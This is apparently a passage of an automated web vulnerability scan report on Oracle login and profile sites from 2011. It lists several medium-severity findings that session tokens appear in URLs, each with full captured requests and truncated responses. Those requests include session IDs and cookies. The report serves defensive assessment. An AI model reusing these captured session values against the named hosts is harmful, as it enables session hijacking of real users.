GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:13 GMT
Set-Cookie: OAM_REQ=VERSION_4~1UuUhb3VlJjpjbcfM%2bCo%2b%2bMiWJ2ThT1j0zV2GIRgsiVXHKq1wWviikzjAmSMNpHcxw1rhPxnndOe6siHyjxtbEM%2buYuUn%2bUvYKd01%2bdN5qmbCefoBjLXOdBrDbalBGhTFH1mcenZ6VQcZOtiYN8%2b2RhWlQVpI0kTgRyqGG40EECD4CxAU4gDEYcZmI2B3wNkljoMdwVuaGWnut3Ws3E5AmamcNRVrdECimq1Mq%2f26%2bWfrUnoqmsx7kxOsJNewr%2bnbiYvS6wDHfxOtJWhU9pUItq8bUkoQwr7H5isBCh5meyvKe8ms68i55w4CahCTz3p6A01AM2dYBzGmRORCv6MqWPBKK5rVQPutfIo4HtNsfY2j5bm56F%2fzt94BzXXWxxsIhITfd%2b5we89fEJFZ2CTJgrZuXFNGB8jvQYx1YE6%2b7ASPoQu6ptzJ7jgdMAcNsxu50KMjCTA9dS18y7RfMmioWGVZaXuiTS26UzYRBWtMqgP6BhdQZSlRcjTcuc46NN8nrnPWOZL4K3h0yZI3vi8mV4sFUAHB2aS%2fObCAYn0yTQ3hhne5ezNrHo%2bH9c64NxLbPfw7eZU0b%2b4HhsFiPrF8I3JW0kUOq2JgvMJfMrL2huNN1Zpg%2bCEZraUo1TgPJ0143QFgYSJe1eczDw2MyCnfK3oh6Qtd7KYCYZqmx2UGJZqdGMHwEYjBtChCnZ%2bAYXC52A7T7BfE9%2bsU5UIViqxLMgLQufDXehYMfsh5xmRetJCVQjKlYhNt7oMAXSuo9O2k7OMGli%2fN4scZh0Pzed3GEjYCczp0U22FIrQ0m%2f%2bmzDHuyeEtas2vlW6JqELbY%2fxow1EezrQ%2bGYJaUxmUmB0yGsjb2F1Rp7CJPqKBgfXUpG7wnI326ZeV6pmgG9tMIY562dx0jU2RAMPJ1RgtCLRBoiQfe5PC4CVl2COVV%2fQGPEJ08Ey9H8gUzMJnEcE45wTXctneFvp7B%2bb%2fqrgJErqrGicSt5dbvcFIsmoCMx7XapdWZKlBi1mu98HJYyULu6G89uz7J7F1OUfVHXvohzzOrSr%2becHY4ndhIRFBwY5sSgv%2bNzfUhO9kDgCTx%2bkyBXZS4ENTxntnbFbXdYwDRUy3ced%2bRD1gv6b5Z1m46L2ASxzktwc8%2ft6h2e%2fZddmlbvJWSuAKXOVJnZPHeqq52brL9R2gKGGj8BrRjerqgBbjDog3QbuqH%2fVAGSNF0SzQwxZUJ6%2bWrNxH4KdRN3jYQrSX8x8LET%2fNACGe9jkZHVZWQKO6%2bAYVadrfVlSSL%2fxDUaDg6rdboxh8xYhMFUB1iAtoS0tCXjvv8L7w3iNda8ERdiiOKy%2bzqxzLqwOti%2bDPDfBmzK%2fPqcoG4eKrU2QS0uiJhNKc1LBvRBAcEjEA6JPJyO7fKHt9Cm61%2bSMW0H4YGmgW1TDtuQ81K00oZc%2bvp8PB%2f5uw3pu3y%2bMHs5TOOFMQv3Ndu%2b6mY%2bqO4nzv3w6U6u8b08hyFm08mgiATuuPlAlRk03u%2bjPRx2hAvWC8poLvKtS0wKaWl8DTa79BTB7DLE8gKChrkaHA2PeautfHjr5C7tfyfsR4L%2fPbtHU2Ei28ge9mNEOIcqrE5h53SVtUecGk51ABEcw%2bu%2f5cvPKa%2frIBDaoUQChQjGIrYSm1J8qODITQ2AJoAe%2fULjYYDVDNM9Mso54mrVWl%2fTy3IZhZNmrS0J5kUhi9G7LHhiUKSx7Y%2fC%2bSPs%2fgVaAtG2nE93v6Y%2b3XHD8w%2fvIU6%2fjajSgqSI5oTv%2bgjlFIUeIzqAc%2fJkSJ%2b8Im1uaWQrVWrz8LjrbXglHGh4%2fdkgqoMYyj85f5xa%2f0NxgBcbU%2bceGpsINAzmIfwo%3d
; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXBDg6uHK6EVADUS1EHWFB01t_b1
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/
Content-Length: 3286

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

8.16. https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/adf/images/sibusy.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/adf/images/sibusy.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:22 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:22 GMT
Content-Type: image/gif
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186961165318884,1)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 781

GIF89a..................................................................................................................................................................................................
...[SNIP]...

8.17. https://myprofile.oracle.com/EndUser/adf/images/siready.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/adf/images/siready.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/adf/images/siready.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:22 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:22 GMT
Content-Type: image/gif
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186948280416951,1)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 417

GIF89a..................................................................................................................................................................................................
...[SNIP]...

8.18. https://myprofile.oracle.com/EndUser/adf/images/t.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/adf/images/t.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/adf/images/t.gif;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:22 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:22 GMT
Content-Type: image/gif
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186935395515062,0)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 86

GIF89a.......................................................!.......,........@...D.;

8.19. https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/adf/jsLibs/Common1_2_12_1.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/adf/jsLibs/Common1_2_12_1.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:20 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:14:20 GMT
Content-Type: application/x-javascript
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186664812572695,0)
Last-Modified: Wed, 17 Feb 2010 07:54:50 GMT
Content-Length: 183096

var _byteLenKey="org.apache.myfaces.trinidad.validator.ByteLengthValidator.MAXIMUM";
function TrByteLengthValidator(
a0,
a1
)
{
this._length=a0;
this._messages=a1;
this._class="TrByteLengthValidator";
...[SNIP]...

8.20. https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:07:15 GMT
Cache-Control: Public
Expires: Mon, 03 Sep 2012 16:07:16 GMT
Last-Modified: Fri, 05 Aug 2011 05:00:27 GMT
Content-Type: text/css
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=109;ecid=30186720647148143,0)
Content-Length: 31848

/* This CSS file generated on Thu Aug 04 22:00:27 PDT 2011 */
.AFInstructionText,.x0,.AFFieldText,.x6,.xk,.xl,.xm,.x23,.x24,.x25,.x26,.x2a,.x2b,.x2c,.x2d,.x2e,.x2f,.x2g,.x2h,.x2i,.x2j,.x1u.x2n .x25,.x
...[SNIP]...

8.21. https://myprofile.oracle.com/EndUser/images/fading-background.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/fading-background.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; s_nr=1315343797232; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:38 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195555395017574,0)
Last-Modified: Fri, 11 Feb 2011 22:10:22 GMT
Content-Length: 164

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...FIDATx.b......01..(.x.....G.;.....QW~....h,.....FK...l$..._.}..:... ....G...U.....IEND.B`.

8.22. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/logo-oracle-red.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:21 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186767891789108,1)
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M    ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

8.23. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:35 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=40;ecid=30186712057213538,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

8.24. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_popup.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:38 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 10:28:50 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=161;ecid=30186686287409627,0)
Content-Length: 233

var popupWindow = null;
var flag = 0;

function openPopup(url)
{
try
{
popupWindow = window.open(url, "popup_id", "scrollbars,resizable,width=800,height=600");
}
catch (err)
{
flag = '1' +
...[SNIP]...

8.25. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_profile.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:29:47 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=249;ecid=30186699172311517,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

8.26. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_validation.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

